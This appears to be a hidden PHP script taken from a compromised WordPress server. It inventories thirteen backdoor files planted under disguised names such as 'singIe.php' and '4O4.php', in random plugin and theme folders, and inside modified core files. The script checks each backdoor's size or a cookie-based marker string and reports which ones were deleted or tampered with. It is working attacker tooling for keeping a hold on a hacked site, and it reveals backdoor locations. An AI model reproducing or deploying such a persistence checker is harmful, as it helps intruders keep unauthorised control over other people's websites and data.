File: //var/tmp/.ptr
<?php $r = '/home/shingkhor/harpyagenda.com'; $x = ["/wp-includes/widgets/class-wp-widget-recent-comments.php"=>"bd@@207577@@_COOKIE[3]",
"/wp-content/plugins/gallery-1751117052/wp-config.php"=>"bd@@427289@@727",
"/f4d1cc.php"=>"bd@@764705@@105",
"/wp-content/themes/archives-1751704832/singIe.php"=>"bd@@438057@@727",
"/wp-includes/block-supports/settings.php"=>"bd@@269138@@If-Modified-Since",
"/wp-includes/block-bindings/pattern-overrides.php"=>"bd@@385144@@publish_content",
"/wp-content/themes/twentytwentyfive/patterns/footer-social.php"=>"bd@@377987@@unit_converter",
"/wp-content/plugins/gallery_1748013966/wp-config.php"=>"bd@@252577@@727",
"/wp-includes/rest-api.php"=>"bd@@357561@@_COOKIE[3]",
"/wp-content/themes/custom_file_3_1747910831/singIe.php"=>"bd@@223454@@731",
"/wp-content/themes/twentytwentyfour/patterns/template-archive-blogging.php"=>"bd@@405983@@_COOKIE[3]",
"/wp-content/themes/top_1757844325/4O4.php"=>"bd@@458735@@967",
"/a61431.php"=>"bd@@66556@@105"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');